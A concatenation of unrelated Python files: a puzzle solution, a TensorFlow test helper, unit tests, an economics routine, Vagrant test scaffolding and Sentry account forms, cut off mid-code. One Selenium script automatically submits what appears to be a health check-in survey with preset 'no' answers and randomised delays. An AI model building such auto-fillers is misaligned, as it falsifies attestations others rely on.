if char := first_illegal_character(line):
raise ValueError(
f"Illegal character {char!r} found at index {line.index(char)}"
)
# Similar process to before
stack: list[str] = []
for char in line:
if char in PAIRS:
# If it's an opening token, push it onto the stack
stack.append(char)
else:
# Must be a closing token, if it's not the closing token
# to whatever is at stack top, we've done something wrong
if char != PAIRS[stack.pop()]:
raise ValueError(
f"Incorrect closing token: got {char!r}, expected"
f" {PAIRS[stack.pop()]}"
)
# Flip the stack around and get the closing token for each
return [PAIRS[char] for char in reversed(stack)]
def calculate_completion_score(completion: list[str]) -> int:
"""
Calculates the completion score for a line of completions.
"""
score = 0
for char in completion:
score *= 5
score += COMPLETION_SCORES[char]
return score
def get_middle(lines: list[str]) -> int:
"""
Gets the middle completion score.
"""
scores = [
calculate_completion_score(complete(line))
for line in lines
if first_illegal_character(line) is None
]
# Puzzle says there is always an odd number of scores
if len(scores) % 2 != 1:
raise ValueError("Got an even number of scores!")
return sorted(scores)[len(scores) // 2]
if __name__ == "__main__":
HERE = Path(__file__).parent.resolve()
INPUT = HERE / "day10.txt"
with open(INPUT) as f:
lines = f.read().strip().splitlines()
print(f"Part 1: {sum(calculate_syntax_score(line) for line in lines)}")
print()
print(f"Part 2: {get_middle(lines)}")
|
py | b4105e35d1b0fda264dcc707534ff45f9c9f9e14 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A convenience wrapper around tf.test.TestCase to enable TPU tests."""
import os
import tensorflow as tf
from tensorflow.contrib import tpu
flags = tf.app.flags
flags.DEFINE_bool('tpu_test', False, 'Whether to configure test for TPU.')
FLAGS = flags.FLAGS
# BEGIN GOOGLE-INTERNAL
def hlo_memory_profile(function):
"""Decorator to set environment variables that produce XLA HLO memory profile.
Args:
function: A function to run with XLA HLO profiling on.
Returns:
A decorated function that dumps the XLA HLO memory profile in test output
directory.
Usage:
@test_case.hlo_memory_profile
def test_run_my_tf_tpu_op(self):
...
After running the test, access the memory profile proto from output files
and generate visualization using XLA memory visualizer.
"""
def wrapper_func(*args, **kwargs):
outputs_dir = os.environ['TEST_UNDECLARED_OUTPUTS_DIR']
path_to_function = os.path.join(outputs_dir, 'hlo_memory_profile',
function.__name__)
os.environ['TF_XLA_FLAGS'] = (
'--xla_dump_optimized_hlo_proto_to=' + path_to_function)
return function(*args, **kwargs)
return wrapper_func
# END GOOGLE-INTERNAL
class TestCase(tf.test.TestCase):
"""Extends tf.test.TestCase to optionally allow running tests on TPU."""
def execute_tpu(self, graph_fn, inputs):
"""Constructs the graph, executes it on TPU and returns the result.
Args:
graph_fn: a callable that constructs the tensorflow graph to test. The
arguments of this function should correspond to `inputs`.
inputs: a list of numpy arrays to feed input to the computation graph.
Returns:
A list of numpy arrays or a scalar returned from executing the tensorflow
graph.
"""
with self.test_session(graph=tf.Graph()) as sess:
placeholders = [tf.placeholder_with_default(v, v.shape) for v in inputs]
tpu_computation = tpu.rewrite(graph_fn, placeholders)
sess.run(tpu.initialize_system())
sess.run([tf.global_variables_initializer(), tf.tables_initializer(),
tf.local_variables_initializer()])
materialized_results = sess.run(tpu_computation,
feed_dict=dict(zip(placeholders, inputs)))
sess.run(tpu.shutdown_system())
if (hasattr(materialized_results, '__len__') and
len(materialized_results) == 1 and
(isinstance(materialized_results, list) or
isinstance(materialized_results, tuple))):
materialized_results = materialized_results[0]
return materialized_results
def execute_cpu(self, graph_fn, inputs):
"""Constructs the graph, executes it on CPU and returns the result.
Args:
graph_fn: a callable that constructs the tensorflow graph to test. The
arguments of this function should correspond to `inputs`.
inputs: a list of numpy arrays to feed input to the computation graph.
Returns:
A list of numpy arrays or a scalar returned from executing the tensorflow
graph.
"""
with self.test_session(graph=tf.Graph()) as sess:
placeholders = [tf.placeholder_with_default(v, v.shape) for v in inputs]
results = graph_fn(*placeholders)
sess.run([tf.global_variables_initializer(), tf.tables_initializer(),
tf.local_variables_initializer()])
materialized_results = sess.run(results, feed_dict=dict(zip(placeholders,
inputs)))
if (hasattr(materialized_results, '__len__') and
len(materialized_results) == 1 and
(isinstance(materialized_results, list) or
isinstance(materialized_results, tuple))):
materialized_results = materialized_results[0]
return materialized_results
def execute(self, graph_fn, inputs):
"""Constructs the graph, creates a test session and returns the results.
The graph is executed either on TPU or CPU based on the `tpu_test` flag.
Args:
graph_fn: a callable that constructs the tensorflow graph to test. The
arguments of this function should correspond to `inputs`.
inputs: a list of numpy arrays to feed input to the computation graph.
Returns:
A list of numpy arrays or a scalar returned from executing the tensorflow
graph.
"""
if FLAGS.tpu_test:
return self.execute_tpu(graph_fn, inputs)
else:
return self.execute_cpu(graph_fn, inputs)
|
py | b4105e70d0ae4cf69034825c8840daaaccc2bf3c | class Error(Exception):
"""Base class for exceptions in this module."""
pass
class MovementError(Error):
"""Exception for invalid movement on the game board"""
pass |
py | b4105fcbdc91a8cfd66e16f775967726848e2a1d | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, HiddenField #, PasswordField, BooleanField
from wtforms.validators import DataRequired
class TagForm(FlaskForm):
newsgroupA = HiddenField('newsgroupA')
tagA = StringField('tag') # , validators=[DataRequired()]
newsgroupB = HiddenField('newsgroupB')
tagB = StringField('tag')
submit = SubmitField('Submit') |
py | b4106043994032aee57b416edf12efefcd03aada | ###############################################################
# pytest -v --capture=no tests/test_05_userdata.py
# pytest -v tests/test_05_userdata.py
# pytest -v --capture=no tests/test_05_userdata.py::Test_burn::test_info
###############################################################
import pytest
import yaml
from cloudmesh.burn.ubuntu.userdata import Userdata
from cloudmesh.common.util import HEADING
@pytest.mark.incremental
class Test_Userdata:
def test_empty_conf(self):
HEADING()
d = Userdata()
correct = {}
correct = Userdata.HEADER + '\n' + yaml.dump(correct)
assert(correct == str(d))
def test_method_order(self):
HEADING()
d = Userdata().with_default_user().with_hostname(hostname='pytest').with_locale().with_ssh_password_login()
e = Userdata().with_hostname(hostname='pytest').with_locale().with_ssh_password_login().with_default_user()
f = Userdata().with_locale().with_ssh_password_login().with_default_user().with_hostname(hostname='pytest')
g = Userdata().with_ssh_password_login().with_default_user().with_hostname(hostname='pytest').with_locale()
d, e, f, g = d.content, e.content, f.content, g.content
assert(d == e)
assert(e == f)
assert(f == g)
|
py | b410606465e6a379826dd7f9bf2956dd2111a1c5 | # Copyright (c) 2016-2017 Hewlett Packard Enterprise Development LP
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat import unittest, mock
from .hpe_test_utils import OneViewBaseTestCase
from .oneview_module_loader import NetworkSetModule
FAKE_MSG_ERROR = 'Fake message error'
NETWORK_SET = dict(
name='OneViewSDK Test Network Set',
networkUris=['/rest/ethernet-networks/aaa-bbb-ccc']
)
NETWORK_SET_WITH_NEW_NAME = dict(name='OneViewSDK Test Network Set - Renamed')
PARAMS_FOR_PRESENT = dict(
config='config.json',
state='present',
data=dict(name=NETWORK_SET['name'],
networkUris=['/rest/ethernet-networks/aaa-bbb-ccc'])
)
PARAMS_WITH_CHANGES = dict(
config='config.json',
state='present',
data=dict(name=NETWORK_SET['name'],
newName=NETWORK_SET['name'] + " - Renamed",
networkUris=['/rest/ethernet-networks/aaa-bbb-ccc', 'Name of a Network'])
)
PARAMS_FOR_ABSENT = dict(
config='config.json',
state='absent',
data=dict(name=NETWORK_SET['name'])
)
class NetworkSetModuleSpec(unittest.TestCase,
OneViewBaseTestCase):
"""
OneViewBaseTestCase has common tests for class constructor and main function,
also provides the mocks used in this test case.
"""
def setUp(self):
self.configure_mocks(self, NetworkSetModule)
self.resource = self.mock_ov_client.network_sets
self.ethernet_network_client = self.mock_ov_client.ethernet_networks
def test_should_create_new_network_set(self):
self.resource.get_by.return_value = []
self.resource.create.return_value = NETWORK_SET
self.mock_ansible_module.params = PARAMS_FOR_PRESENT
NetworkSetModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=NetworkSetModule.MSG_CREATED,
ansible_facts=dict(network_set=NETWORK_SET)
)
def test_should_not_update_when_data_is_equals(self):
self.resource.get_by.return_value = [NETWORK_SET]
self.mock_ansible_module.params = PARAMS_FOR_PRESENT
NetworkSetModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=NetworkSetModule.MSG_ALREADY_PRESENT,
ansible_facts=dict(network_set=NETWORK_SET)
)
def test_update_when_data_has_modified_attributes(self):
data_merged = dict(name=NETWORK_SET['name'] + " - Renamed",
networkUris=['/rest/ethernet-networks/aaa-bbb-ccc',
'/rest/ethernet-networks/ddd-eee-fff']
)
self.resource.get_by.side_effect = [NETWORK_SET], []
self.resource.update.return_value = data_merged
self.ethernet_network_client.get_by.return_value = [{'uri': '/rest/ethernet-networks/ddd-eee-fff'}]
self.mock_ansible_module.params = PARAMS_WITH_CHANGES
NetworkSetModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=NetworkSetModule.MSG_UPDATED,
ansible_facts=dict(network_set=data_merged)
)
def test_should_raise_exception_when_ethernet_network_not_found(self):
self.resource.get_by.side_effect = [NETWORK_SET], []
self.ethernet_network_client.get_by.return_value = []
self.mock_ansible_module.params = PARAMS_WITH_CHANGES
NetworkSetModule().run()
self.mock_ansible_module.fail_json.assert_called_once_with(
exception=mock.ANY,
msg=NetworkSetModule.MSG_ETHERNET_NETWORK_NOT_FOUND + "Name of a Network"
)
def test_should_remove_network(self):
self.resource.get_by.return_value = [NETWORK_SET]
self.mock_ansible_module.params = PARAMS_FOR_ABSENT
NetworkSetModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=NetworkSetModule.MSG_DELETED
)
def test_should_do_nothing_when_network_set_not_exist(self):
self.resource.get_by.return_value = []
self.mock_ansible_module.params = PARAMS_FOR_ABSENT
NetworkSetModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=NetworkSetModule.MSG_ALREADY_ABSENT
)
def test_update_scopes_when_different(self):
params_to_scope = PARAMS_FOR_PRESENT.copy()
params_to_scope['data']['scopeUris'] = ['test']
self.mock_ansible_module.params = params_to_scope
resource_data = NETWORK_SET.copy()
resource_data['scopeUris'] = ['fake']
resource_data['uri'] = 'rest/network-sets/fake'
self.resource.get_by.return_value = [resource_data]
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
self.resource.patch.return_value = patch_return
NetworkSetModule().run()
self.resource.patch.assert_called_once_with('rest/network-sets/fake',
operation='replace',
path='/scopeUris',
value=['test'])
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(network_set=patch_return),
msg=NetworkSetModule.MSG_UPDATED
)
def test_should_do_nothing_when_scopes_are_the_same(self):
params_to_scope = PARAMS_FOR_PRESENT.copy()
params_to_scope['data']['scopeUris'] = ['test']
self.mock_ansible_module.params = params_to_scope
resource_data = NETWORK_SET.copy()
resource_data['scopeUris'] = ['test']
self.resource.get_by.return_value = [resource_data]
NetworkSetModule().run()
self.resource.patch.not_been_called()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(network_set=resource_data),
msg=NetworkSetModule.MSG_ALREADY_PRESENT
)
if __name__ == '__main__':
unittest.main()
|
py | b410607c95fd2d6015c6344926a167413fbd0abc | import numpy as np
from scipy.optimize import fminbound
def bellman_operator(w, grid, β, u, f, shocks, Tw=None, compute_policy=0):
"""
The approximate Bellman operator, which computes and returns the
updated value function Tw on the grid points. An array to store
the new set of values Tw is optionally supplied (to avoid having to
allocate new arrays at each iteration). If supplied, any existing data in
Tw will be overwritten.
Parameters
----------
w : array_like(float, ndim=1)
The value of the input function on different grid points
grid : array_like(float, ndim=1)
The set of grid points
β : scalar
The discount factor
u : function
The utility function
f : function
The production function
shocks : numpy array
An array of draws from the shock, for Monte Carlo integration (to
compute expectations).
Tw : array_like(float, ndim=1) optional (default=None)
Array to write output values to
compute_policy : Boolean, optional (default=False)
Whether or not to compute policy function
"""
# === Apply linear interpolation to w === #
w_func = lambda x: np.interp(x, grid, w)
# == Initialize Tw if necessary == #
if Tw is None:
Tw = np.empty_like(w)
if compute_policy:
σ = np.empty_like(w)
# == set Tw[i] = max_c { u(c) + β E w(f(y - c) z)} == #
for i, y in enumerate(grid):
def objective(c):
return - u(c) - β * np.mean(w_func(f(y - c) * shocks))
c_star = fminbound(objective, 1e-10, y)
if compute_policy:
σ[i] = c_star
Tw[i] = - objective(c_star)
if compute_policy:
return Tw, σ
else:
return Tw
|
py | b410613d70d4ede91f363203915afcfa521faeae | from __future__ import with_statement
import os
import os.path
try:
import unittest2 as unittest
except ImportError:
import unittest
from fabric.api import *
from fabric.state import connections
import fabtools
from fabtools import require
def version():
"""
Get the vagrant version as a tuple
"""
with settings(hide('running')):
res = local('vagrant --version', capture=True)
ver = res.split()[2]
return tuple(map(int, ver.split('.')))
def halt_and_destroy():
"""
Halt and destoy virtual machine
"""
with lcd(os.path.dirname(__file__)):
if os.path.exists('Vagrantfile'):
local('vagrant halt')
if version() >= (0, 9, 99):
local('vagrant destroy -f')
else:
local('vagrant destroy')
def base_boxes():
"""
Get the list of vagrant base boxes to use
The default is to get the list of all base boxes.
This can be overridden with the VAGRANT_BOXES environment variable.
"""
boxes = os.environ.get('VAGRANT_BOXES')
if boxes is not None:
return boxes.split()
else:
res = local('vagrant box list', capture=True)
if res.failed:
return []
else:
return res.splitlines()
class VagrantTestSuite(unittest.BaseTestSuite):
"""
Test suite with vagrant support
"""
def __init__(self, base_boxes):
self.base_boxes = base_boxes
self.current_box = None
unittest.BaseTestSuite.__init__(self)
def addTest(self, test):
test._suite = self
unittest.BaseTestSuite.addTest(self, test)
def run(self, result):
"""
Run the test suite on all the virtual machines
"""
# Clean up
halt_and_destroy()
for base_box in self.base_boxes:
# Start a virtual machine using this base box
self.current_box = base_box
self.start_box()
# Clear fabric connection cache
with self.settings():
if env.host_string in connections:
del connections[env.host_string]
# Make sure the vagrant user can sudo to any user
with self.settings():
require.sudoer('vagrant')
# Make sure the package index is up to date
with self.settings():
fabtools.deb.update_index()
# Run the test suite
unittest.BaseTestSuite.run(self, result)
# Stop the virtual machine and clean up
self.stop_box()
def start_box(self):
"""
Spin up a new vagrant box
"""
with lcd(os.path.dirname(__file__)):
# Create a fresh vagrant config file
local('rm -f Vagrantfile')
local('vagrant init %s' % self.current_box)
# Spin up the box
# (retry as it sometimes fails for no good reason)
local('vagrant up || vagrant up')
def ssh_config(self):
"""
Get SSH connection parameters for the current box
"""
with lcd(os.path.dirname(__file__)):
if version() >= (0, 9, 0):
command = 'ssh-config'
else:
command = 'ssh_config'
with settings(hide('running')):
output = local('vagrant %s' % command, capture=True)
config = {}
for line in output.splitlines()[1:]:
key, value = line.strip().split(' ', 2)
config[key] = value
return config
def stop_box(self):
"""
Spin down the vagrant box
"""
halt_and_destroy()
with lcd(os.path.dirname(__file__)):
local('rm -f Vagrantfile')
self.current_box = None
def settings(self, *args, **kwargs):
"""
Return a Fabric context manager with the right host settings
"""
config = self.ssh_config()
user = config['User']
hostname = config['HostName']
port = config['Port']
kwargs['host_string'] = "%s@%s:%s" % (user, hostname, port)
kwargs['user'] = user
kwargs['key_filename'] = config['IdentityFile']
kwargs['disable_known_hosts'] = True
return settings(*args, **kwargs)
class VagrantTestCase(unittest.TestCase):
"""
Test case with vagrant support
"""
def run(self, result=None):
"""
Run the test case within a Fabric context manager
"""
with self._suite.settings():
unittest.TestCase.run(self, result)
class VagrantFunctionTestCase(unittest.FunctionTestCase):
"""
Function test case with vagrant support
"""
def run(self, result=None):
"""
Run the test case within a Fabric context manager
"""
with self._suite.settings():
unittest.FunctionTestCase.run(self, result)
|
py | b41061d4418cd06b2e724d1247778316410b7efd | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
import time
from random import uniform
def open_form(browser):
print("Starting form...")
# Wait for start survey button to appear
check_in_btn = WebDriverWait(browser, 10).until(
EC.element_to_be_clickable((By.CSS_SELECTOR, "button[data-qa-id='check-in-button']"))
)
check_in_btn.click()
def answer_question(browser, input_id_suffix):
# Wait for answer button to appear
answer_inputs = WebDriverWait(browser, 10).until(
EC.presence_of_all_elements_located((By.CSS_SELECTOR, f"[id$={input_id_suffix}]"))
)
# Input isn't clickable, so click its parent element instead
last_answer_input = answer_inputs[-1]
last_answer_lbl = last_answer_input.find_element(By.XPATH, "..")
last_answer_lbl.click()
def submit_survey(browser):
print("Submitting form...")
submit_btn = browser.find_element(By.CLASS_NAME, "MuiButton-containedPrimary")
submit_btn.click()
print("Form submitted...")
def fill_form(browser):
open_form(browser)
answer_input_id_suffixes = [
"yes",
"no",
"no",
"no",
"no",
"no",
"no"
]
print("Filling out form...")
for input_id_suffix in answer_input_id_suffixes:
answer_question(browser, input_id_suffix)
time.sleep(uniform(1, 3)) # seconds
# TODO Make a delay function
submit_survey(browser)
def verify_form_completion(browser):
# Wait for form completion to appear
try:
form_completed_elem = WebDriverWait(browser, 5).until(
EC.presence_of_element_located((By.ID, "lastCheckInLabel"))
)
form_completion_success = True
except TimeoutException:
form_completion_success = False
return form_completion_success
#TODO validate using datetime in time element to ensure the most recent from filling succeeded |
py | b4106278bdebbd76d1b4a0926e2a45a305ac7e50 | """
sentry.web.forms.accounts
~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import pytz
import six
from datetime import datetime
from django import forms
from django.conf import settings
from django.contrib.auth import authenticate, get_user_model
from django.db.models import Q
from django.utils.text import capfirst, mark_safe
from django.utils.translation import ugettext_lazy as _
from sentry import newsletter, options
from sentry.auth import password_validation
from sentry.app import ratelimiter
from sentry.constants import LANGUAGES
from sentry.models import (Organization, OrganizationStatus, User, UserOption, UserOptionValue)
from sentry.security import capture_security_activity
from sentry.utils.auth import find_users, logger
from sentry.web.forms.fields import CustomTypedChoiceField, ReadOnlyTextField
from six.moves import range
def _get_timezone_choices():
results = []
for tz in pytz.common_timezones:
now = datetime.now(pytz.timezone(tz))
offset = now.strftime('%z')
results.append((int(offset), tz, '(UTC%s) %s' % (offset, tz)))
results.sort()
for i in range(len(results)):
results[i] = results[i][1:]
return results
TIMEZONE_CHOICES = _get_timezone_choices()
class AuthenticationForm(forms.Form):
username = forms.CharField(
label=_('Account'),
max_length=128,
widget=forms.TextInput(attrs={
'placeholder': _('username or email'),
'tabindex': 1,
}),
)
password = forms.CharField(
label=_('Password'),
widget=forms.PasswordInput(attrs={
'placeholder': _('password'),
'tabindex': 2,
}),
)
error_messages = {
'invalid_login':
_(
"Please enter a correct %(username)s and password. "
"Note that both fields may be case-sensitive."
),
'rate_limited':
_("You have made too many failed authentication "
"attempts. Please try again later."),
'no_cookies':
_(
"Your Web browser doesn't appear to have cookies "
"enabled. Cookies are required for logging in."
),
'inactive':
_("This account is inactive."),
}
def __init__(self, request=None, *args, **kwargs):
"""
If request is passed in, the form will validate that cookies are
enabled. Note that the request (a HttpRequest object) must have set a
cookie with the key TEST_COOKIE_NAME and value TEST_COOKIE_VALUE before
running this validation.
"""
self.request = request
self.user_cache = None
super(AuthenticationForm, self).__init__(*args, **kwargs)
# Set the label for the "username" field.
UserModel = get_user_model()
self.username_field = UserModel._meta.get_field(UserModel.USERNAME_FIELD)
if not self.fields['username'].label:
self.fields['username'].label = capfirst(self.username_field.verbose_name)
def clean_username(self):
value = (self.cleaned_data.get('username') or '').strip()
if not value:
return
return value.lower()
def is_rate_limited(self):
if self._is_ip_rate_limited():
return True
if self._is_user_rate_limited():
return True
return False
def _is_ip_rate_limited(self):
limit = options.get('auth.ip-rate-limit')
if not limit:
return False
ip_address = self.request.META['REMOTE_ADDR']
return ratelimiter.is_limited(
'auth:ip:{}'.format(ip_address),
limit,
)
def _is_user_rate_limited(self):
limit = options.get('auth.user-rate-limit')
if not limit:
return False
username = self.cleaned_data.get('username')
if not username:
return False
return ratelimiter.is_limited(
u'auth:username:{}'.format(username),
limit,
)
def clean(self):
username = self.cleaned_data.get('username')
password = self.cleaned_data.get('password')
if not (username and password):
raise forms.ValidationError(
self.error_messages['invalid_login'] %
{'username': self.username_field.verbose_name}
)
if self.is_rate_limited():
logger.info(
'user.auth.rate-limited',
extra={
'ip_address': self.request.META['REMOTE_ADDR'],
'username': username,
}
)
raise forms.ValidationError(self.error_messages['rate_limited'])
self.user_cache = authenticate(username=username, password=password)
if self.user_cache is None:
raise forms.ValidationError(
self.error_messages['invalid_login'] %
{'username': self.username_field.verbose_name}
)
self.check_for_test_cookie()
return self.cleaned_data
def check_for_test_cookie(self):
if self.request and not self.request.session.test_cookie_worked():
raise forms.ValidationError(self.error_messages['no_cookies'])
def get_user_id(self):
if self.user_cache:
return self.user_cache.id
return None
def get_user(self):
return self.user_cache
class PasswordlessRegistrationForm(forms.ModelForm):
name = forms.CharField(
label=_('Name'),
max_length=30,
widget=forms.TextInput(attrs={'placeholder': 'Jane Doe'}),
required=True
)
username = forms.EmailField(
label=_('Email'),
max_length=128,
widget=forms.TextInput(attrs={'placeholder': '[email protected]'}),
required=True
)
subscribe = CustomTypedChoiceField(
coerce=lambda x: six.text_type(x) == u'1',
label=_("Email updates"),
choices=(
(1, 'Yes, I would like to receive updates via email'),
(0, "No, I'd prefer not to receive these updates"),
),
widget=forms.RadioSelect,
required=True,
initial=False,
)
def __init__(self, *args, **kwargs):
super(PasswordlessRegistrationForm, self).__init__(*args, **kwargs)
if not newsletter.is_enabled():
del self.fields['subscribe']
else:
# NOTE: the text here is duplicated within the ``NewsletterConsent`` component
# in the UI
notice = (
"We'd love to keep you updated via email with product and feature "
"announcements, promotions, educational materials, and events. "
"Our updates focus on relevant information, and we'll never sell "
"your data to third parties. See our "
"<a href=\"{privacy_link}\">Privacy Policy</a> for more details."
)
self.fields['subscribe'].help_text = mark_safe(
notice.format(privacy_link=settings.PRIVACY_URL))
class Meta:
fields = ('username', 'name')
model = User
def clean_username(self):
value = (self.cleaned_data.get('username') or '').strip()
if not value:
return
if User.objects.filter(username__iexact=value).exists():
raise forms.ValidationError(
_('An account is already registered with that email address.'))
return value.lower()
def save(self, commit=True):
user = super(PasswordlessRegistrationForm, self).save(commit=False)
user.email = user.username
if commit:
user.save()
if self.cleaned_data.get('subscribe'):
newsletter.create_or_update_subscriptions(
user, list_ids=newsletter.get_default_list_ids())
return user
class RegistrationForm(PasswordlessRegistrationForm):
password = forms.CharField(
required=True,
widget=forms.PasswordInput(attrs={'placeholder': 'something super secret'}),
)
def clean_password(self):
password = self.cleaned_data['password']
password_validation.validate_password(password)
return password
def save(self, commit=True):
user = super(RegistrationForm, self).save(commit=False)
user.set_password(self.cleaned_data['password'])
if commit:
user.save()
if self.cleaned_data.get('subscribe'):
newsletter.create_or_update_subscriptions(
user, list_ids=newsletter.get_default_list_ids())
return user
class RecoverPasswordForm(forms.Form):
user = forms.CharField(
label=_('Account'),
max_length=128,
widget=forms.TextInput(attrs={'placeholder': _('username or email')}),
)
def clean_user(self):
value = (self.cleaned_data.get('user') or '').strip()
if not value:
return
users = find_users(value, with_valid_password=False)
if not users:
raise forms.ValidationError(_("We were unable to find a matching user."))
users = [u for u in users if not u.is_managed]
if not users:
raise forms.ValidationError(
_(
"The account you are trying to recover is managed and does not support password recovery."
)
)
if len(users) > 1:
raise forms.ValidationError(
_("Multiple accounts were found matching this email address.")
)
return users[0]
class ChangePasswordRecoverForm(forms.Form):
password = forms.CharField(widget=forms.PasswordInput())
def clean_password(self):
password = self.cleaned_data['password']
password_validation.validate_password(password)
return password
class EmailForm(forms.Form):
alt_email = forms.EmailField(
label=_('New Email'),
required=False,
help_text='Designate an alternative email for this account',
)
password = forms.CharField(
label=_('Current password'),
widget=forms.PasswordInput(),
help_text=_('You will need to enter your current account password to make changes.'),
required=True,
)
def __init__(self, user, *args, **kwargs):
self.user = user
super(EmailForm, self).__init__(*args, **kwargs)
needs_password = user.has_usable_password()
if not needs_password:
del self.fields['password']
def clean_password(self):
value = self.cleaned_data.get('password')
if value and not self.user.check_password(value):
raise forms.ValidationError(_('The password you entered is not correct.'))
elif not value:
raise forms.ValidationError(
_('You must confirm your current password to make changes.')
)
return value
class AccountSettingsForm(forms.Form):
name = forms.CharField(required=True, label=_('Name'), max_length=30)
username = forms.CharField(label=_('Username'), max_length=128)
email = forms.EmailField(label=_('Email'))
new_password = forms.CharField(
label=_('New password'),
widget=forms.PasswordInput(),
required=False,
# help_text=password_validation.password_validators_help_text_html(),
)
verify_new_password = forms.CharField(
label=_('Verify new password'),
widget=forms.PasswordInput(),
required=False,
)
password = forms.CharField(
label=_('Current password'),
widget=forms.PasswordInput(),
help_text='You will need to enter your current account password to make changes.',
required=False,
)
def __init__(self, user, request, *args, **kwargs):
self.user = user
self.request = request
super(AccountSettingsForm, self).__init__(*args, **kwargs)
needs_password = user.has_usable_password()
if self.user.is_managed:
# username and password always managed, email and
# name optionally managed
for field in ('email', 'name', 'username'):
if field == 'username' or field in settings.SENTRY_MANAGED_USER_FIELDS:
self.fields[field] = ReadOnlyTextField(label=self.fields[field].label)
if field == 'email':
needs_password = False
del self.fields['new_password']
del self.fields['verify_new_password']
# don't show username field if its the same as their email address
if self.user.email == self.user.username:
del self.fields['username']
if not needs_password:
del self.fields['password']
def is_readonly(self):
if self.user.is_managed:
return set(('email', 'name')) == set(settings.SENTRY_MANAGED_USER_FIELDS)
return False
def _clean_managed_field(self, field):
if self.user.is_managed and (
field == 'username' or field in settings.SENTRY_MANAGED_USER_FIELDS
):
return getattr(self.user, field)
return self.cleaned_data[field]
def clean_email(self):
value = self._clean_managed_field('email').lower()
if self.user.email.lower() == value:
return value
if User.objects.filter(Q(email__iexact=value) | Q(username__iexact=value)).exclude(
id=self.user.id
).exists():
raise forms.ValidationError(
_("There was an error adding %s: that email is already in use") %
self.cleaned_data['email']
)
return value
def clean_name(self):
return self._clean_managed_field('name')
def clean_username(self):
value = self._clean_managed_field('username')
if User.objects.filter(username__iexact=value).exclude(id=self.user.id).exists():
raise forms.ValidationError(_("That username is already in use."))
return value
def clean_password(self):
value = self.cleaned_data.get('password')
if value and not self.user.check_password(value):
raise forms.ValidationError('The password you entered is not correct.')
elif not value and (
self.cleaned_data.get('email', self.user.email) != self.user.email or
self.cleaned_data.get('new_password')
):
raise forms.ValidationError('You must confirm your current password to make changes.')
return value
def clean_verify_new_password(self):
new_password = self.cleaned_data.get('new_password')
if new_password:
verify_new_password = self.cleaned_data.get('verify_new_password')
if verify_new_password is None:
raise forms.ValidationError('You must verify your new password.')
if new_password != verify_new_password:
raise forms.ValidationError('Your new password and verify new password must match.')
return verify_new_password
def clean_new_password(self):
new_password = self.cleaned_data.get('new_password')
if new_password:
password_validation.validate_password(new_password)
return new_password
def save(self, commit=True):
if self.cleaned_data.get('new_password'):
self.user.set_password(self.cleaned_data['new_password'])
self.user.refresh_session_nonce(self.request)
capture_security_activity(
account=self.user,
type='password-changed',
actor=self.request.user,
ip_address=self.request.META['REMOTE_ADDR'],
send_email=True,
)
self.user.name = self.cleaned_data['name']
if self.cleaned_data['email'] != self.user.email:
new_username = self.user.email == self.user.username
else:
new_username = False
self.user.email = self.cleaned_data['email']
if self.cleaned_data.get('username'):
self.user.username = self.cleaned_data['username']
elif new_username and not User.objects.filter(username__iexact=self.user.email).exists():
self.user.username = self.user.email
if commit:
self.user.save()
return self.user
class AppearanceSettingsForm(forms.Form):
language = forms.ChoiceField(
label=_('Language'),
choices=LANGUAGES,
required=False,
widget=forms.Select(attrs={'class': 'input-xlarge'})
)
stacktrace_order = forms.ChoiceField(
label=_('Stacktrace order'),
choices=(
('-1', _('Default (let Sentry decide)')), ('1', _('Most recent call last')),
('2', _('Most recent call first')),
),
help_text=_('Choose the default ordering of frames in stacktraces.'),
required=False,
widget=forms.Select(attrs={'class': 'input-xlarge'})
)
timezone = forms.ChoiceField(
label=_('Time zone'),
choices=TIMEZONE_CHOICES,
required=False,
widget=forms.Select(attrs={'class': 'input-xxlarge'})
)
clock_24_hours = forms.BooleanField(
label=_('Use a 24-hour clock'),
required=False,
)
def __init__(self, user, *args, **kwargs):
self.user = user
super(AppearanceSettingsForm, self).__init__(*args, **kwargs)
def save(self):
# Save user language
UserOption.objects.set_value(
user=self.user,
key='language',
value=self.cleaned_data['language'],
)
# Save stacktrace options
UserOption.objects.set_value(
user=self.user,
key='stacktrace_order',
value=self.cleaned_data['stacktrace_order'],
)
# Save time zone options
UserOption.objects.set_value(
user=self.user,
key='timezone',
value=self.cleaned_data['timezone'],
)
# Save clock 24 hours option
UserOption.objects.set_value(
user=self.user,
key='clock_24_hours',
value=self.cleaned_data['clock_24_hours'],
)
return self.user
class NotificationReportSettingsForm(forms.Form):
organizations = forms.ModelMultipleChoiceField(
queryset=Organization.objects.none(),
required=False,
widget=forms.CheckboxSelectMultiple(),
)
def __init__(self, user, *args, **kwargs):
self.user = user
super(NotificationReportSettingsForm, self).__init__(*args, **kwargs)
org_queryset = Organization.objects.filter(
status=OrganizationStatus.VISIBLE,
member_set__user=user,
)
disabled_orgs = set(
UserOption.objects.get_value(
user=user,
key='reports:disabled-organizations',
default=[],
)
)
self.fields['organizations'].queryset = org_queryset
self.fields['organizations'].initial = [
